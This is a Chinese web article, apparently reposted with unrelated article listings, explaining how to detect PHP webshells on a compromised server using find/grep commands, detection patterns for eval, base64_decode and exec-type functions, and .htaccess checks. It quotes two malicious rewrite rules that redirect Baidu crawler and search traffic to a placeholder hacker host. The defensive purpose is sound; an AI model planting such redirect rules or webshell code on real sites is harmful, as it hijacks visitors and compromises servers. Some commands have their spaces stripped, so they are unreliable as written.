相关文章
htaccess文件还可以被用来把访问网站的流量劫持到黑客的网站
2024-11-10 17:04

看是否有文件上传操作(POST方法),

htaccess文件还可以被用来把访问网站的流量劫持到黑客的网站

IPREMOVED--[01/Mar/2013:06:16:48-0600]"POST/uploads/monthly_10_2012/view.php HTTP/1.1"20036"-""Mozilla/5.0" IPREMOVED--[01/Mar/2013:06:12:58-0600]"POST/public/style_images/master/profile/blog.php HTTP/1.1"20036"-""Mozilla/5.0"

nginx默认记录的日志格式为:

access_log logs/access.log

access_log logs/access.log combined;

nginx默认记录日志的位置为:

nginx安装目录/log/ 0x02 查找含有恶意php代码的文件

2.1 查找最近发生变化的php文件

find.-typef-name'*.php'-mtime-7

-type f 表示搜索正常的一般文件 -mtime -7 表示7*24小时内修改的文件

结果可能如下:

./uploads/monthly_04_2008/index.php ./uploads/monthly_10_2008/index.php ./uploads/monthly_08_2009/template.php ./uploads/monthly_02_2013/index.php

2.2 查找文件中是否存在疑似代码

find.-typef-name'*.php'|xargsgrep-l"eval *("--color

(*代表任意个空格)

find.-typef-name'*.php'|xargsgrep-l"base64_decode *("--color find.-typef-name'*.php'|xargsgrep-l"gzinflate *("--color find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color

注解:很多命令不支持管道传递参数,而实际上又需要这样,所以就用了xargs命令,这个命令可以用来管道传递参数;grep -l表示只包含某个字符串的文件名,如果去掉-l则会显示匹配特定字符串的行内容

几个特殊字符串的意义: eval()把字符串按照php代码来执行,是最常见的php一句话木马

base64_decode() 将字符串base64解码,攻击的时候payload是base64编码,则这个函数就有用武之地了

gzinflate(2881064151) 将字符串解压缩处理,攻击的时候payload用gzdeflate压缩之后,使用这个函数进行解压缩

str_rot13() 对字符串进行rot13编码

也可以使用正则表达式来搜索文件,查找可以代码:

find.-typef-name'*.php'|xargsegrep-i"(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *("

下面解释webshell常用的函数:

mail():可用来向网站用户发送垃圾邮件

fsockopen():打开一个网络连接或者一个unix套接字连接,可用于payload发送远程请求

pfsockopen():和fsockopen()作用类似

stream_socket_client():建立一个远程连接,例子如下:

<?php $fp=stream_socket_client("tcp://www.example.com:80",$errno,$errstr,30); if(!$fp){ echo"$errstr($errno)<br/> "; }else{ fwrite($fp,"GET/HTTP/1.0 Host:www.example.com Accept:*/* "); while(!feof($fp)){ echofgets($fp,1024); } fclose($fp); } ?>

exec():命令执行函数

system():同exec()

passthru():同exec()

preg_replace()正则表达式由修饰符"e"修饰的时候,替换字符串在替换之前需要按照php代码执行,这种情况也需要考虑到,这种情况可采用这种以下扫搜:

find.-typef-name'*.php'|xargsegrep-i"preg_replace *((['|"])(.).*2[a-z]*e[^1]*1 *,"--color 0x03 比较代码文件

这种情况需要有一份干净的代码,这份代码和正在使用的代码进行比较。例如

diff-rwordpress-clean/wordpress-compromised/-xwp-content

上面的例子是比较wordpress-clean/ 和wordpress-comprised/两个目录,并且目录里面的wp-content/子目录不比较

0x04 搜寻可写的目录

看这个目录里面是否有可疑文件,如下脚本查找权限为777的目录是否存在php文件

search_dir=$(pwd) writable_dirs=$(find$search_dir-typed-perm0777) fordirin$writable_dirs do #echo $dir find$dir-typef-name'*.php' done

黑客经常在jpg文件中插入php代码,因此在查询这些目录的时候也要查询jpg文件:

findwp-content/uploads-typef-iname'*.jpg'|xargsgrep-iphp

注意:-iname 表示文件名不区分大小写 grep -i 也表示不区分大小写

0x05 检测iframe标签

黑客经常做的是嵌入iframe标签,因此可以查看网页的源代码,并且搜索其中是否存在iframe标签,可使用如下命令:

grep-i'<iframe'mywebsite.txt

对于动态生成的页面,可使用ff的Live HTTP Headers插件,下载到源码之后再查找是否存在iframe标签

0x06 查找数据库中是否存在敏感字符串

包括%base64_%、%eval(%<等上面提到的一些关键词

0x07 检查.htaccess文件

是否包含了auto_prepend_file和auto_append_file,使用如下命令

find . -type f -name '.htaccess' | xargs grep -i auto_prepend_file find . -type f -name '.htaccess' | xargs grep -i auto_append_file

auto_prepend_file的作用是加载当前脚本文件之前,先加载的php脚本 auto_append_file的作用是加载当前脚本文件之后,再加载的php脚本。黑客如果这么修改了.htaccess文件,那么可以在访问.htaccess目录的php脚本时,加载上自己想要加载的恶意脚本.

htaccess文件还可以被用来把访问网站的流量劫持到黑客的网站,

RewriteCond %{HTTP_USER_AGENT}^.*Baiduspider.*$ Rewriterule ^(.*)$ http://www.hacker.com/muma.php [R=301]

将baidu爬虫的访问重定向到黑客的网站(包含HTTP_USER_AGENT和http关键字)

RewriteCond %{HTTP_REFERER} ^.*baidu.com.*$ Rewriterule ^(.*)$ http://www.hacker.com/muma.php [R=301]

将来自baidu搜索引擎的流量重定向到黑客的网站(包含HTTP_REFERER和http关键字) 为了查看网站是否被.htaccess修改导致流量劫持,可以在搜索.htaccess文件的时候采用如下命令:

    以上就是本篇文章【htaccess文件还可以被用来把访问网站的流量劫持到黑客的网站】的全部内容了,欢迎阅览 ! 文章地址:http://dgaty.xhstdz.com/news/1446.html 
     栏目首页      相关文章      动态      同类文章      热门文章      网站地图      返回首页 物流园资讯移动站 http://dgaty.xhstdz.com/mobile/ , 查看更多   
最新文章
AI在创造还是毁掉音乐?深度学习时代的音乐变革
近一个月来,音乐界迎来了一场由人工智能主导的变革。随着多个音乐大模型的相继亮相,AI技术一举将音乐创作的门槛降
短视频排名seo(短视频排行榜前十名)
提高短视频曝光率**#8211; 如何吸引更多的观众?在当今社交媒体爆炸的时代,多种类型的短视频在不同的平台上迅速传播。但与此同
SEO培训课程助力企业快速提升网站排名,抢占市场风口
本课程专注于SEO培训,旨在帮助企业优化网站,提升排名,抢占市场优势,通过专业指导助力企业在线上竞争中获得先机。随着互联网
云南uc神马搜索广告怎么开户
在互联网广告日益发展的今天,企业的市场推广已成为提升业绩的重要组成部分。云南作为一个旅游和文化丰富的省份,吸引了大量用户
wordpress插件,免费蜘蛛统计分析插件,wordpres翻译插件「附下载」
Wordpress采集插件不需要任何采集规则,完全实现一键抓取任务。支持365天无限循环挂机采集维护所有网站。设置好相关参数后,软件
2024年区块链技术培训:全新课件发布
2024年区块链技术培训:全新课件发布汇报人:2024-11-16区块链技术基础区块链核心技术详解区块链平台与开发工具介绍区块链安全性
Dynadot支持哪些中文域名后缀
Dynadot是一家知名的国外域名注册商,成立于2002年,其官网支持中文、英文、法语、西班牙语等多种语言切换,主要提供域名注册、
如何轻松应对Nginx配置文件大小限制提高网站性能与稳定性
为什么需要关注Nginx配置文件大小限制 在使用Nginx作为网站服务器的过程中,配置文件的大小限制是一个常见的问题。当配置文件过大时,会导致服务器性能下降,影响网站的稳定性和访问速度。因此,及时优化和调整配置文件大小非常重要。 如何
打造健康生活新选择:养生馆推广文案写作技巧揭秘
引言:健康生活的追求 在现代社会中,健康已经成为人们最看重的财富之一。快节奏的生活和不断加重的工作压力,使得越来越多的人开始关注自己的身心健康。养生馆作为一种创新的健康生活方式应运而生,它不仅为人们提供了放松身心的场所,还
探索兰州魅力:一份全面的兰州旅游攻略揭开牛肉面与黄河的秘密
探索兰州:邂逅西北的魅力之城 兰州,作为甘肃省的省会,坐落于黄河上游,是一座历史悠久而又充满活力的城市。这里不仅拥有丰富的文化遗产,还有壮观的自然景观。兰州以其独特的地理位置、深厚的文化底蕴和美味的地方美食吸引着越来越多的
相关文章